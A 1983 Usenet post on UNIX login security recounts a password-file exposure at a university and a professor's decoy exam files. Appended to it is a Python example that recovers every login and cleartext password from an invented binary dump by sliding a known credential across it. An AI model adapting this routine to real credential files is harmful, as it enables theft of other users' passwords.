Relay-Version: version B 2.10 5/3/83; site utzoo.UUCP
Path: utzoo!linus!genrad!decvax!harpo!floyd!vax135!ariel!hou5f!hou5e!hou5d!hogpc!houxm!hocda!spanky!burl!rcj
From: rcj@burl.UUCP
Newsgroups: net.unix-wizards
Subject: Re: a thought about UNIX login security
Message-ID: <206@burl.UUCP>
Date: Sun, 19-Jun-83 17:56:34 EDT
Article-I.D.: burl.206
Posted: Sun Jun 19 17:56:34 1983
Date-Received: Thu, 23-Jun-83 00:17:30 EDT
Lines: 58

As one of the more guilty parties (re: Ed's article about not discussing security in net.unix-wizards), I feel obligated to relate a real-life example of a system break-in (the only really major one that I have first-hand experience with), and the consequences thereof:

I went to school at a major Southern university. We primarily used a DEC-10 running the TOPS-10 operating system, although we switched to Unix on a PDP-11/34 for the upper-level courses later. The school of pharmacy made great use of the DEC-10 for research purposes, and there was one grad student in pharmacy who was the guru for the whole pharmacy school. This grad student was liked by EVERYONE, taught two computer courses for the computer science dept. every term, and had won several awards from the University.

If any of the pharmacy faculty (or anyone else he knew) forgot their password, they just went to Jim (not his real name) and he would pull out a little printout that he had and tell them. This went on for some time until someone at the Computing Center found out about it and hit the ceiling. Apparently (and remember, this is not Unix), someone had the password file VERY well protected, but the binary copy that was actually read by the system was readable by everyone. Jim found this out, got a dump of the binary, and used a sliding window technique to find out the password field and then decoded the simple ASCII.

Even though it was demonstrated to everyone's satisfaction that Jim did not take advantage of this information in ANY way whatsoever, and even taking into account his very high standing with the University, and even though both the Computer Science dept. of the School of Engineering and the Dean of the Pharmacy School came to bat for him, he still came within one vote of losing his job. And this information was just lying around for anyone to look at -- all he had to do was a very simple decoding. Imagine what would have happened had he really had to break a lot of stuff to get in!!!

Because I worked on our Unix installation, I had privileged access (read: root password). One day, I was trying to find something for one of my professors when I catted a file that came up:

	Second Semester Final for CSCI xxx

I immediately hit delete, and went to my professor later to tell him exactly what had happened in case he had some sort of accounting daemon running that I didn't know about. He smiled, said it was ok, and that he had three bogus copies of that final on disk just to catch anyone who might break in. He told me further that the real exam was always typed in by his assistant on the night before the exam, or even the morning thereof.

Computer Science professors (and, increasingly, those in other areas) know that students will try to break in -- and those possible access methods are usually not totally booby-trap-free. It ain't worth it, when there's so much money to be made so easy in computer-related fields.

-- 
The MAD Programmer -- 919-228-3814 (Cornet 291)
alias: Curtis Jackson
...![ floyd sb1 mhuxv ]!burl!rcj
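The break-in the post describes (a well-protected password file whose world-readable binary copy was dumped and scanned with a sliding window until the plain-ASCII password field turned up) as an added example that is not part of the original post and is not the TOPS-10 file format. The 32-byte record layout, the account names, the uids and the passwords below are all constructed for illustration; the only thing carried over from the post is that the password field holds plain ASCII. The approach taken is the one an attacker with a single known credential (his own) would use: slide that known string over the dump to find where the name and password fields sit, infer the record stride from there, and then read every record.

```python
"""Added example: recovering cleartext passwords from a world-readable binary
copy of a password file by sliding a known credential over the dump.

Not code from the original post and not the TOPS-10 layout.  The record
format and the accounts below are invented for the example.
"""
import struct

PRINTABLE = frozenset(range(0x20, 0x7F))

# Constructed layout, 32 bytes per record (invented for this example):
#   0..7   login name, ASCII, NUL padded
#   8..11  uid, big-endian
#   12..15 flags, big-endian
#   16..23 password, ASCII, NUL padded   (the "simple ASCII" the post mentions)
#   24..31 binary filler, every byte >= 0x80
SAMPLE_ACCOUNTS = [            # constructed sample data
    ("operator", 1, 3, "dec10ops"),
    ("jim", 1017, 1, "pharm42"),
    ("dr_smith", 1042, 1, "tulip"),
    ("rcj", 1280, 1, "madprog"),
]


def build_dump(accounts=SAMPLE_ACCOUNTS):
    """Serialise the constructed accounts into the binary dump an attacker would read."""
    out = bytearray()
    for name, uid, flags, password in accounts:
        out += name.encode("ascii").ljust(8, b"\0")
        out += struct.pack(">II", uid, flags)
        out += password.encode("ascii").ljust(8, b"\0")
        out += bytes(0x80 | ((uid + i) & 0x7F) for i in range(8))
    return bytes(out)


def looks_like_text(chunk):
    """A candidate field slot holds only printable ASCII or NUL padding, and is not all padding."""
    return (bool(chunk)
            and all(b in PRINTABLE or b == 0 for b in chunk)
            and any(b in PRINTABLE for b in chunk))


def read_field(buf, off, limit=16):
    """Return the printable-ASCII run starting at off (at most limit bytes)."""
    end = off
    while end < len(buf) and end - off < limit and buf[end] in PRINTABLE:
        end += 1
    return buf[off:end].decode("ascii")


def find_layout(dump, known_name, known_password, max_stride=256):
    """Slide the known credential over the dump and return (name_off, pw_off, stride).

    Each field occurs once per record, so the stride must exceed the distance
    between the two known fields.  Beyond that we take the smallest stride at
    which every aligned slot in the whole dump still looks like a text field;
    multiples of the true stride also pass, which is why the smallest wins.
    """
    name = known_name.encode("ascii")
    password = known_password.encode("ascii")
    name_pos = dump.find(name)       # on a real dump check every hit: "jim" also sits inside "jimmy"
    pw_pos = dump.find(password)
    if name_pos < 0 or pw_pos < 0:
        raise ValueError("known credential not found in dump")
    delta = abs(pw_pos - name_pos)

    def all_slots_ok(pos, width, stride):
        first = pos % stride
        return all(looks_like_text(dump[p:p + width])
                   for p in range(first, len(dump) - width + 1, stride))

    for stride in range(delta + 1, max_stride + 1):
        if (all_slots_ok(name_pos, len(name), stride)
                and all_slots_ok(pw_pos, len(password), stride)):
            return name_pos % stride, pw_pos % stride, stride
    raise ValueError("no consistent record stride found")


def dump_credentials(dump, known_name, known_password):
    """Recover every (name, password) pair once the layout has been inferred."""
    name_off, pw_off, stride = find_layout(dump, known_name, known_password)
    return [(read_field(dump, base + name_off), read_field(dump, base + pw_off))
            for base in range(0, len(dump) - stride + 1, stride)]


if __name__ == "__main__":
    for login, pw in dump_credentials(build_dump(), "rcj", "madprog"):
        print(f"{login:10s} {pw}")
```

The point the post makes survives the toy layout: once the bytes are readable, locating the field is a few minutes of work with one credential you already own, and the "protection" on the source file buys nothing. The stride search is the sliding window; it does not need to know the record size in advance, only that a name and its password live in the same record.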